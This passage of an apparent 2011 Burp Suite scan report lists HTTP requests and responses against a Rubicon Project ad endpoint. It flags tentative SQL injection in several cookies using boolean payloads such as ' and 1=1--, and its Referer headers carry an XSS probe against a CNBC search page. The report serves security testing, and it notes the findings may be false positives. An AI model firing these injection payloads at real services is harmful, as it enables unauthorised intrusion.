GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=6&k=cnbc+search:80,script+alert:80,title+script:80,xss36c5e+title:80,script+2789f6ff334a89918:80,search+results:72,matching+symbols:64,sponsored+results:64,refine+results:64,cnbc:46,xss36c5e:40,script:40,search+result:32,refine+result:32,matching+symbol:32,sponsored+result:32,2789f6ff334a89918:24,cnbc+pro:24,title:20,alert:20,asia+pacific:16,special+reports:16,last:16,date:16,sponsored:16,matching:16,symbols:16,refine:16,format:16,cnbc+tv:16,video:14,days:12,stock+screener:8,ceo+interviews:8,earnings+front:8,special+report:8,member+center:8,fund+screener:8,symbol+lookup:8,markets+front:8,&rd=burp&t=xss36c5e HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss36c5e%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E2789f6ff334a89918&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530'%20and%201%3d1--%20; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=12|4|8|0; rdk=6451/11953; rdk15=0; ses15=11953^2; csi15=3187871.js^1^1308225219^1308225219&3206204.js^1^1308225202^1308225202

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:08:53 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 12:08:53 GMT; Path=/
Set-Cookie: dq=17|4|13|0; Expires=Fri, 15-Jun-2012 12:08:53 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=6&k=cnbc+search:80,script+alert:80,title+script:80,xss36c5e+title:80,script+2789f6ff334a89918:80,search+results:72,matching+symbols:64,sponsored+results:64,refine+results:64,cnbc:46,xss36c5e:40,script:40,search+result:32,refine+result:32,matching+symbol:32,sponsored+result:32,2789f6ff334a89918:24,cnbc+pro:24,title:20,alert:20,asia+pacific:16,special+reports:16,last:16,date:16,sponsored:16,matching:16,symbols:16,refine:16,format:16,cnbc+tv:16,video:14,days:12,stock+screener:8,ceo+interviews:8,earnings+front:8,special+report:8,member+center:8,fund+screener:8,symbol+lookup:8,markets+front:8,&rd=burp&t=xss36c5e HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss36c5e%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E2789f6ff334a89918&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530'%20and%201%3d2--%20; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=12|4|8|0; rdk=6451/11953; rdk15=0; ses15=11953^2; csi15=3187871.js^1^1308225219^1308225219&3206204.js^1^1308225202^1308225202

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:08:53 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.28. http://tap.rubiconproject.com/oz/sensor [put_1994 cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The put_1994 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the put_1994 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=13&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,posted+yet:64,cnbc+welcomes:64,must+click:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,related+links:64,2011:56,asia+pacific:56,datetime+05:56,5+27:48,6+16:48,05+24:48,2011+5:48,16+2011:48,special+reports:48,expiration+datetime:48,datetime+6:48,datetime:46,billion:46,equity+will:40,energy+news:40,will+benefit:40,will+buy:40,datetime+11:40,24+54:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w'%20and%201%3d1--%20; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=19|4|15|0; rdk2=0; ses2=11953^3; csi2=3183300.js^1^1308227126^1308227126&3187870.js^2^1308226504^1308226815; rdk=6451/11953; rdk15=0; ses15=11953^8; csi15=3206204.js^3^1308225202^1308227128&3187871.js^5^1308225219^1308226816; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:09:54 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:09:54 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:09:54 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=13&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,posted+yet:64,cnbc+welcomes:64,must+click:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,related+links:64,2011:56,asia+pacific:56,datetime+05:56,5+27:48,6+16:48,05+24:48,2011+5:48,16+2011:48,special+reports:48,expiration+datetime:48,datetime+6:48,datetime:46,billion:46,equity+will:40,energy+news:40,will+benefit:40,will+buy:40,datetime+11:40,24+54:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w'%20and%201%3d2--%20; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=19|4|15|0; rdk2=0; ses2=11953^3; csi2=3183300.js^1^1308227126^1308227126&3187870.js^2^1308226504^1308226815; rdk=6451/11953; rdk15=0; ses15=11953^8; csi15=3206204.js^3^1308225202^1308227128&3187871.js^5^1308225219^1308226816; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:09:54 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.29. http://tap.rubiconproject.com/oz/sensor [put_2054 cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The put_2054 cookie appears to be vulnerable to SQL injection attacks. The payloads 45036362'%20or%201%3d1--%20 and 45036362'%20or%201%3d2--%20 were each submitted in the put_2054 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=54&k=southern+union:336,energy+transfer:320,buy+southern:208,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:114,billion+cnbc:80,union:72,transfer:72,southern:72,must+click:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,6+16:48,8+06:48,special+reports:48,datetime:46,billion:46,union+company:40,gas+production:40,will+buy:40,transfer+partners:40,midstream+company:40,large+midstream:40,will+benefit:40,energy+news:40,equity+will:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa445036362'%20or%201%3d1--%20; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; cd=false; dq=44|4|40|0; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%263512%3D1%262197%3D1%262579%3D1%263811%3D1%262374%3D1; ses2=11953^33; csi2=2553662.js^7^1308233336^1308236745&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; rdk=6451/11953; ses15=11953^39; csi15=2553663.js^8^1308234261^1308236739&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:06:21 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 15:06:22 GMT; Path=/
Set-Cookie: dq=45|4|41|0; Expires=Fri, 15-Jun-2012 15:06:22 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=54&k=southern+union:336,energy+transfer:320,buy+southern:208,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:114,billion+cnbc:80,union:72,transfer:72,southern:72,must+click:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,6+16:48,8+06:48,special+reports:48,datetime:46,billion:46,union+company:40,gas+production:40,will+buy:40,transfer+partners:40,midstream+company:40,large+midstream:40,will+benefit:40,energy+news:40,equity+will:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa445036362'%20or%201%3d2--%20; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; cd=false; dq=44|4|40|0; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%263512%3D1%262197%3D1%262579%3D1%263811%3D1%262374%3D1; ses2=11953^33; csi2=2553662.js^7^1308233336^1308236745&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; rdk=6451/11953; ses15=11953^39; csi15=2553663.js^8^1308234261^1308236739&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:06:22 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.30. http://tap.rubiconproject.com/oz/sensor [put_2101 cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The put_2101 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the put_2101 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,please+respect:64,related+links:64,cnbc+welcomes:64,posted+yet:64,cnbc+highlights:64,must+click:64,cnbc+reserves:64,datetime+05:56,2011:56,asia+pacific:56,2011+5:48,5+36:48,6+16:48,expiration+datetime:48,16+2011:48,special+reports:48,datetime+6:48,datetime:46,billion:46,will+benefit:40,energy+news:40,equity+will:40,burgeoning+u:40,union+company:40,gas+production:40,transfer+equity:40,datetime+11:40,midstream+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1'%20and%201%3d1--%20; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; cd=false; dq=21|4|17|0; rdk2=0; ses2=11953^5; csi2=3187870.js^4^1308226504^1308227750&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^10; csi15=3187871.js^7^1308225219^1308227751&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:11:48 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:11:48 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:11:48 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,please+respect:64,related+links:64,cnbc+welcomes:64,posted+yet:64,cnbc+highlights:64,must+click:64,cnbc+reserves:64,datetime+05:56,2011:56,asia+pacific:56,2011+5:48,5+36:48,6+16:48,expiration+datetime:48,16+2011:48,special+reports:48,datetime+6:48,datetime:46,billion:46,will+benefit:40,energy+news:40,equity+will:40,burgeoning+u:40,union+company:40,gas+production:40,transfer+equity:40,datetime+11:40,midstream+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1'%20and%201%3d2--%20; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; cd=false; dq=21|4|17|0; rdk2=0; ses2=11953^5; csi2=3187870.js^4^1308226504^1308227750&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^10; csi15=3187871.js^7^1308225219^1308227751&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:11:48 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.31. http://tap.rubiconproject.com/oz/sensor [rdk cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The rdk cookie appears to be vulnerable to SQL injection attacks. The payloads 19874108'%20or%201%3d1--%20 and 19874108'%20or%201%3d2--%20 were each submitted in the rdk cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=93&k=southern+union:328,energy+transfer:312,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:112,billion+cnbc:80,union:72,transfer:72,southern:72,please+respect:64,must+click:64,cnbc+reserves:64,cnbc+highlights:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,8+27:48,6+16:48,special+reports:48,billion:46,datetime:46,union+company:40,will+buy:40,burgeoning+u:40,11+billion:40,transfer+partners:40,midstream+company:40,large+midstream:40,will+benefit:40,energy+news:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
